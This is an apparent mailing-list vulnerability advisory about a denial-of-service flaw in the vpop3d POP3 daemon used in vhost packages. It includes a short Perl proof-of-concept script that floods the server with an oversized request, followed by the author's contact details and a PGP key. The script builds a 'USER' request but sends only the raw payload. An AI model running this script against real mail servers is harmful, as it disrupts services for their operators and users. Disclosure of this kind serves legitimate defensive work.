Hi,

Topic:
vpop3d Denial Of service

Product:
vpop3d

Note:
This is implemented in several vhost packages, I can't name all of them,
but vhost-3.05r3 is one.

Vendor Notification:
Notified several Vendors about the binary vpop3d that they are using in
their packages,
Original Author of vpop3d has been mailed, haven't had anything back yet..

Background:
/*
 *      pop3d           - IP/TCP/POP3 server for UNIX 4.3BSD
 *                        Post Office Protocol - Version 3 (RFC1225)
 *
 *      (C) Copyright 1991 Regents of the University of California
 *
*/
modified by various vendors to fit their need, however I have seen this
flaw in several vhost software packages.

Problem Description:
Seems that an attacker (remote or local) can cause a DOS on the vpop3d
server, using a lengthy request..
This seems to cause the pop3 server to timeout then daemon drops...Note
this was tested locally, with the binary..
Once we've hit it with our huge USER string it gives this mesg after 5mins
or so then dies...
"-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from
client"

Impact:
DOS on the vpop3d daemon, means a manual restart of the daemon.


Patch:
Far too much to patch in this code!!!

NOTE:
Thanks to Jake Fan(<jake@chaogic.com>)
For his input, and his help tracking the original author, and also for the
fast reply..so thanks Jake :)

Exploit:
Nothing special..
----------------------------------------------------------
#!/usr/bin/perl

#vpop3d Denial Of Service..
#Proof of Concept script..
#Deadbeat, uk2sec..
#e: deadbeat@sdf.lonestar.org
#e: daniels@legend.co.uk

use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
if(!$ARGV[1]){
        die "usage: perl $0 <host> <port>\n";
}
$dos = "%s%s"x5000;
$req = "USER $dos";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>$port,
        PeerAddr=>$host
)or die "can't connect to $host : $port\n";
sleep 2;
print $sox $dos;
sleep 1;
print "done..vpop3d should lock now :)\n";

------------------------------EOF-------------------------


Regards,
Deadbeat, uk2sec..

-------------------------------------
Deadbeat,
e:	deadbeat@sdf.lonestar.org
e:	daniels@legend.co.uk
-------------------------------------





-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.6 (NetBSD)
Comment: For info see http://www.gnupg.org

mQGiBDxWfZARBACBQnb2BXzrByAvVKIS1w3Hu4vtgwY/C6hAZrPGDpGcRYnXF7a8
uhquXYQ1IM0AXHwZ0Jca8YSQOVfS6UBojU/ZmkRweQVaa7MEJiRwZ/2dPTG572GY
nM/grv0XVXun/16y+v3tApRwVkrjbHF3k3UgMzRJxmzMSsDT2XSdN2o34wCgw9+D
5faE/kVRlEs5x50ijIcBFcMD/0oMZ1kV3+YVVpXe2CI+If3PSi2+IAvxgFHeEQQB
6nRwmGsVsh6O7kFHagRUScehQgja2IMCtVan7dFmP1CI/k3TsFSf6suiEdTv1sMV
H5N3jJVSAHM6Fm87qhCpeskvdXdkd7n6HPeATmGAaSH3SB3FqVmVq6Qqk/gBK5Qu
t87MA/4wGICDZ6/sx0S3S3NBt2oulTUVQbWIgFhgD9wZAyEO6ruKEk1olba0oAaA
iA+SAf9EY2RyKw9QhosG6Csgqa80VBvkS+rZXBzaaEXfNxuR6MV3cGrs75l+KKI4
tPofUuD643ALLNo4IgxTHWpTD+sabbSCh7e1Meg6BBQuFWSs6bQwRGFuaWVsICho
ZWxvIG5hc3RlZSkgPGRlYWRiZWF0QHNkZi5sb25lc3Rhci5vcmc+iF0EExECAB0F
AjxWfZAFCQDtTgAFCwcKAwQDFQMCAxYCAQIXgAAKCRAaRjzWDUUMXXpVAKCHV7p9
vt4wjcAK2aIodmKrdgrECQCgu0u3f1Tt8VPOIhpyZPqYgmGm+TW5Ag0EPFZ9rhAI
AMHUvRtSXUmwEbqJuS6FfCRZCzqkegv8HOC9kZNjOb8l7mLQ0NFs2E17FpEk9E5A
B2jzX/HDFYiqMJu+xZCfFQMYRMx1KHPCprbM2p4LXJviCTnpEO2FlPiZ54b4s1Dc
56HBfWxLiP9SPCJwWZWEfbqKJI7PnE3kDE+zc7tqhNPyMQZGaWBq1MkTYq9MmM1x
wzOPj4Mv0clL4cpyjI6q4gveIEIkZlHwwVO0bpil+7jrM1dSPOoTuitoKsDy6FvO
+nnqw/VAn/SE1I9H8hsvN17wa2br7LELhEBycVTsHU/qr4KsxAcz77U/5/K47arG
+uM52DoxFpjSpi54Ez83s1cAAwUH/0HSEtOkIETS6jiOKlYFXO/8sOh8yaRr6e9T
+da2UNxTEQDz4nNac8TS0UxrBKXTQf8tVnOYajhEG6ZVD10Xvhn0fv9gc96hEIi3
qY8YRVX/TY/PGtVdOBvQuqWjnkSLP5xbDsBa9vdpM9s2XyaEmJ9aLWSBeeO9Hjd9
v91jxJupH7HqxxvhePEtY/QujT5XIk9p4YPzzhBXMf6jLNqIvEFFeAhoNgheodE6
EuRSfh4YJ8dpIKUQxQTtx/hmbnjMpRT/Fi4AI2KGS0wGR8brs94T4J91u4cYrkzL
r9Bri0gkxj3L9+nEFSrqm0J7ihbW0blqr+8HZxLeNYXDNtfoqdyITAQYEQIADAUC
PFZ9rgUJAO1OAAAKCRAaRjzWDUUMXYlPAKCCZcdDJmlTFCYrBcYoAefYbMEc5ACf
aSJMzYo9ENJ22pd/5nw5c2vxsbI=
=TwPI
-----END PGP PUBLIC KEY BLOCK-----